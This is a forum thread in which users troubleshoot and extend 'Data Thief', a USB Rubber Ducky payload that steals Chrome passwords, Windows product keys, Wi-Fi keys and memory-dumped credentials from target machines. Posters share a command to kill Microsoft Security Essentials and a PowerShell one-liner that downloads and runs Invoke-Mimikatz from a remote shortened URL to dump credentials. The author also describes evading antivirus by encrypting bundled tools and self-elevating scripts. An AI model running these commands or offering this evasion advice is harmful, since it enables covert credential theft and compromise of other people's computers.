Allucard Posted November 29, 2013 Share Posted November 29, 2013 hello lavanoid i'm having a problem with the payload, the SP.bat version 1.6 isn't doing everything it should like getting the pass dump and the chrome pass and more, but the SP.bat 1.5 is working fine. I have changed the setting inside the SP.bat trough all the combination possible and nothing, i'm running a win7 64 bit and reminding that i run the version 1.5 fine. Thank's for the good work Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted November 29, 2013 Author Share Posted November 29, 2013 hello lavanoid i'm having a problem with the payload, the SP.bat version 1.6 isn't doing everything it should like getting the pass dump and the chrome pass and more, but the SP.bat 1.5 is working fine. I have changed the setting inside the SP.bat trough all the combination possible and nothing, i'm running a win7 64 bit and reminding that i run the version 1.5 fine. Thank's for the good work I've just uploaded another update. One of the batch labels in the SP.bat file were misspelt. My keyboard didn't enter the "_" for the 64_bit label. Should be working perfectly now. Comment if you encounter any more issues. Quote Link to comment Share on other sites More sharing options...
Allucard Posted November 29, 2013 Share Posted November 29, 2013 thank's and one other thing that i only check today with the previously version but if i try to do that in one unprivileged user the windows ask for the password of the admin, is there anyway around it??? Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted November 29, 2013 Author Share Posted November 29, 2013 thank's and one other thing that i only check today with the previously version but if i try to do that in one unprivileged user the windows ask for the password of the admin, is there anyway around it??? Well, without Administrative access, the only things the payload can do really is get Chrome login data, and Windows product keys. The procdump won't work because it requires access to another programs ram data - which needs admin access, Mimikatz won't work because once again - needs access to another programs ram data, and wifi keys cannot be recovered because of Microsofts encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine - it won't work. So the answear to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want. Quote Link to comment Share on other sites More sharing options...
Allucard Posted January 19, 2014 Share Posted January 19, 2014 Lavanoidhello how are you???what happen or better question why did you no longer have the payload available??? can i do anything to help??? Quote Link to comment Share on other sites More sharing options...
MB60893 Posted January 19, 2014 Share Posted January 19, 2014 (edited) Well, without Administrative access, the only things the payload can do really is get Chrome login data, and Windows product keys. The procdump won't work because it requires access to another programs ram data - which needs admin access, Mimikatz won't work because once again - needs access to another programs ram data, and wifi keys cannot be recovered because of Microsofts encryption methods. You can export the wifi keys, but they will ONLY work on the machine that you "backed" them up from; if you try importing the keys on another machine - it won't work. So the answear to your question is yes, you can use the payload without admin access (you need to tell the payload to run "SCRIPT_EX.bat" instead of "SCRIPT_EX.exe"), but you won't be able to get much data without it. It's all down to what information you want. You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft security essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :) Edited January 20, 2014 by MB60893 Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted January 20, 2014 Author Share Posted January 20, 2014 (edited) Lavanoid hello how are you??? what happen or better question why did you no longer have the payload available??? can i do anything to help??? I removed the payload because of reasons that I currently don't want to discuss. All I'm saying is - its a secret . I also think that people should realize how much potential this payload has, compared to the other simple payloads out there. My aim is to make the ultimate payload. Anyway, any help would be appreciated. Do you have any ideas of what else I could add? Any example scripts that I could manifest into the current system batch file would be cool. By "System batch file", I mean the SP.bat file. I'll re-upload the payload within a week or two. You might be wondering why so long. Well - like I said, a secret . Edited January 20, 2014 by Lavanoid Quote Link to comment Share on other sites More sharing options...
mw3demo Posted January 20, 2014 Share Posted January 20, 2014 I removed the payload because of reasons that I currently don't want to discuss. All I'm saying is - its a secret . I also think that people should realize how much potential this payload has, compared to the other simple payloads out there. My aim is to make the ultimate payload. Anyway, any help would be appreciated. Do you have any ideas of what else I could add? Any example scripts that I could manifest into the current system batch file would be cool. By "System batch file", I mean the SP.bat file. I'll re-upload the payload within a week or two. You might be wondering why so long. Well - like I said, a secret . Looking forward to it. :) You have done a bunch of great work on the earlier versions, and spent a considerable amount of time fine tuning. OSX Payload next? :P Keep it up! Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted January 20, 2014 Author Share Posted January 20, 2014 You are in luck. There is a tool in the Metasploit Framework which allows administrative access to be used. Only thing is that Microsoft security essentials recognises the bypassuac program as potentially malicious. An easy fix to this is to kill any monitoring security programs with the command line utility task "Taskkill /f /im msseces.exe /t" and that should make everything work great! Just do some research on your target machine and check what antivirus they have, then use a wget from powershell to download and use the application. Good luck with this, it sounds like a fantastic project and I can't wait to have a look at the duckyscript behind it!! :) HHHmmmmm. Seems like a good idea to implement Metasploit in the payload - however, I'd need support from a group of people who have different antivirus programs. Then I'd need them to write batch files that can successfully terminate the AV user interface. Then I'd need them to make notes of what service their AV programs run under - this way, once elevation has been granted (through Metasploit) - we could just kill the AV services. If you manage to successfully get a script that can be added to the payload which has Metasploit implemented, then that would be great. I don't have much time to tinker with Metasploit so it would be great if you guys can mess around with it instead. Great idea though :D . Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted January 20, 2014 Author Share Posted January 20, 2014 Looking forward to it. :) You have done a bunch of great work on the earlier versions, and spent a considerable amount of time fine tuning. OSX Payload next? :P Keep it up! Thanks. As for OSX, unfortunately - I don't have a OSX system :( otherwise I would have definitely created a payload for mac systems too. However, I have been looking into how the mac OS works by Googleing a lot. It's a lot like Linux (Is it Linux based?). Anyway, if I ever get my hands on a Apple computer (Maybe in the next 2/3 years? - I'm not someone with much money ) I'll let you know. Quote Link to comment Share on other sites More sharing options...
MB60893 Posted January 20, 2014 Share Posted January 20, 2014 (edited) Hi again Lavanoid, You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus. powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well!Give it a go! MB60893. Edited January 20, 2014 by MB60893 Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted January 20, 2014 Author Share Posted January 20, 2014 Hi again Lavanoid, You can use this fantastic script which uses mimikatz, and it doesn't set off any antivirus. powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" You do need the administrative rights to run the powershell with this script, but it does work, and it won't make your AV go berserk because it uses Mimikatz from in memory, meaning no need for procdump as well!Give it a go! MB60893. I used Mimikatz in the previous versions of Data Thief, but it does trigger Microsoft Security essentials (Why pay for antivirus?). I bypassed this issue by storing Mimikatz in a encrypted zip archive then when needed, 7-zip would decrypt the archive and then run Mimikatz, the advantage of this is that since the Duck RW speeds are slow, antivirus cannot scan the Duck because it is in use by 7-Zip and Mimikatz. Some (if not all) people think its bad that the Duck has slow RW speeds, but I think it gives us the advantage. The advantage of procdump is that it doesn't trigger AV, but it can be slow :/. Another thing is - Mimikatz doesn't work with Windows 8.1 due to the new security enhancements. I don;t have Windows 8, but I did try it on a friends PC. I would have Windows 8 but they have a OEM key (they key you get when you buy a computer) so I can't activate it - I need a genuine Windows key :/. Anyway - back to the main subject. Mimikatz has been implemented in data thief already. Thanks anyway though :D . Before I release DT (Data Thief) - I recommend installing the Duck 4CAP firmware (you can get it on Ducky Decode). I recommend it because if Windows takes its time installing the drivers (Common with netbook computers), you don't have to worry about it exceeding the delay time. Quote Link to comment Share on other sites More sharing options...
Sabri Posted February 8, 2014 Share Posted February 8, 2014 Really thanks for your job, sir. The payloads works fine for me, but it's detected from my AV: Avira Free that has been put in Real-Time mode. You or anyone else knows how to circumvent this problem stealthly? Thanks again. Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 9, 2014 Author Share Posted February 9, 2014 (edited) Really thanks for your job, sir. The payloads works fine for me, but it's detected from my AV: Avira Free that has been put in Real-Time mode. You or anyone else knows how to circumvent this problem stealthly? Thanks again. Is it possible that you send me your backup log, tell me what file was detected by your AV and send the installation parameters? E.g. Installation path like: "C:\Program Files\Antivirus", Service name: "Antivirus Service", and most important, the AV exe name: "AntivirusUI.exe" or/and "AntivirusSVC.exe". A directory listing of your antivirus programs installation path would be cool. You can do this by running cmd.exe, then use this command: DIR "C:\Program Files\Antivirus" > "%USERPROFILE%\Desktop\DirectoryListing.txt" You would obviously have to edit the directory part. Thanks for the bug report :D Edited February 9, 2014 by Lavanoid Quote Link to comment Share on other sites More sharing options...
Sabri Posted February 9, 2014 Share Posted February 9, 2014 Is it possible that you send me your backup log, tell me what file was detected by your AV and send the installation parameters? E.g. Installation path like: "C:\Program Files\Antivirus", Service name: "Antivirus Service", and most important, the AV exe name: "AntivirusUI.exe" or/and "AntivirusSVC.exe". A directory listing of your antivirus programs installation path would be cool. You can do this by running cmd.exe, then use this command: DIR "C:\Program Files\Antivirus" > "%USERPROFILE%\Desktop\DirectoryListing.txt" You would obviously have to edit the directory part. Thanks for the bug report :D There is no backup log because it stops after the indication that windows update has started. The file detected is: "SCRIPT_EX.exe" as a "TR/ATRAPS.Gen". The Antivirus folder is: C:\Program Files (x86)\Avira\AntiVir Desktop The dir content is here: http://speedy.sh/ENee9/DirectoryListing.txt Let me know if this is enough! Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 10, 2014 Author Share Posted February 10, 2014 There is no backup log because it stops after the indication that windows update has started. The file detected is: "SCRIPT_EX.exe" as a "TR/ATRAPS.Gen". The Antivirus folder is: C:\Program Files (x86)\Avira\AntiVir Desktop The dir content is here: http://speedy.sh/ENee9/DirectoryListing.txt Let me know if this is enough! HHHmmm. So I guess I'd have to find a different way of executing the the Data Thief batch file. I could write a program with Visual Basic but unfortunately, I no longer have the required tools to write a program because my netbook hard drive got fried :/. I could try writing a self elevating batch script. I realized that the Slax Linux installer batch file has the ability to self elevate. I'll look into it. I guess AV picks up the SCRIPT_EX.exe file as a virus because its a compiled batch script and a lot of people compile batch scripts for malicious purposes. I compiled it with Abyss Quick Batch File Compiler. I'll see if I can release a fix within the next few days. Thanks. Quote Link to comment Share on other sites More sharing options...
Sabri Posted February 10, 2014 Share Posted February 10, 2014 HHHmmm. So I guess I'd have to find a different way of executing the the Data Thief batch file. I could write a program with Visual Basic but unfortunately, I no longer have the required tools to write a program because my netbook hard drive got fried :/. I could try writing a self elevating batch script. I realized that the Slax Linux installer batch file has the ability to self elevate. I'll look into it. I guess AV picks up the SCRIPT_EX.exe file as a virus because its a compiled batch script and a lot of people compile batch scripts for malicious purposes. I compiled it with Abyss Quick Batch File Compiler. I'll see if I can release a fix within the next few days. Thanks. Thanks a lot in advance for your effort and for taking care of my situation. Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 10, 2014 Author Share Posted February 10, 2014 Thanks a lot in advance for your effort and for taking care of my situation. I believe I have solved your problem. I edited the SCRIPT_EX.bat file to be able to self elevate itself so the SCRIPT_EX.exe file is no longer needed. I've also edited the Installer.bat and Compiler.bat so that newly created inject.bin files are written to execute SCRIPT_EX.bat instead of SCRIPT_EX.exe. Just download the update, extract it, remove SCRIPT_EX.exe from the duck as well as inject.bin; then run Installer.bat to copy the required files. Hope this update works ;) Quote Link to comment Share on other sites More sharing options...
Sabri Posted February 10, 2014 Share Posted February 10, 2014 I believe I have solved your problem. I edited the SCRIPT_EX.bat file to be able to self elevate itself so the SCRIPT_EX.exe file is no longer needed. I've also edited the Installer.bat and Compiler.bat so that newly created inject.bin files are written to execute SCRIPT_EX.bat instead of SCRIPT_EX.exe. Just download the update, extract it, remove SCRIPT_EX.exe from the duck as well as inject.bin; then run Installer.bat to copy the required files. Hope this update works ;) Sadly, now the AV detects nctstart.exe and Execute_ncstart.exe as TR/ATRAPS.Gen :( Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 11, 2014 Author Share Posted February 11, 2014 Sadly, now the AV detects nctstart.exe and Execute_ncstart.exe as TR/ATRAPS.Gen :( I believe I've just fixed the problem. I'll upload the update within the next 12 hours as I currently don't have the time to do so. I've also edited the NetCat Terminal.bat file so it has more functions than the previous versions :D . Hope this update will solve your problems ;) . Quote Link to comment Share on other sites More sharing options...
Epoc Posted February 12, 2014 Share Posted February 12, 2014 Thanks for all your great work Lavanoid ! About your question on the first page, "I've been looking around the duck forums and found this payload (https://forums.hak5....r-rubber-ducky/), I think its a really cool payload since it seems to support a wider range of programs that can be backed up - However, that being said; It doesn't support XP, neither does it have many precautions of avoiding AV, so - Do you prefer this payload or the Mr Grays payload?" I would like to believe in the creation of a fusion with your ducky script and the Mr Grays payload's script. For my opinon, it's a great combination if it's possible ! Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 14, 2014 Author Share Posted February 14, 2014 Thanks for all your great work Lavanoid ! About your question on the first page, "I've been looking around the duck forums and found this payload (https://forums.hak5....r-rubber-ducky/), I think its a really cool payload since it seems to support a wider range of programs that can be backed up - However, that being said; It doesn't support XP, neither does it have many precautions of avoiding AV, so - Do you prefer this payload or the Mr Grays payload?" I would like to believe in the creation of a fusion with your ducky script and the Mr Grays payload's script. For my opinon, it's a great combination if it's possible ! Indeed, a fusion of the scripts is definitely possible. Although AV will detect the programs, I am going to deal with that issue by fusing all the programs as one and then encrypt them so that when they run, AV won't know what it is. Quote Link to comment Share on other sites More sharing options...
Epoc Posted February 14, 2014 Share Posted February 14, 2014 Indeed, a fusion of the scripts is definitely possible. Although AV will detect the programs, I am going to deal with that issue by fusing all the programs as one and then encrypt them so that when they run, AV won't know what it is. Thank you very much for the answer ! However, i found that the most of applications contained in the packet of Mr Grays are outdated. For example, the latest version of PasswordFox app of Nirsoft's site have the abilities to detecting passwords on a machine running Windows 7 64bit, unlike the first app in the original package. That's all, and thank you again for this wonderful work ! Quote Link to comment Share on other sites More sharing options...
Sabri Posted February 16, 2014 Share Posted February 16, 2014 Thanks a lot Lavanoid, now it works perfectly to me! Quote Link to comment Share on other sites More sharing options...
UnKn0wnBooof Posted February 17, 2014 Author Share Posted February 17, 2014 Thanks a lot Lavanoid, now it works perfectly to me! That's great to hear :D . Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.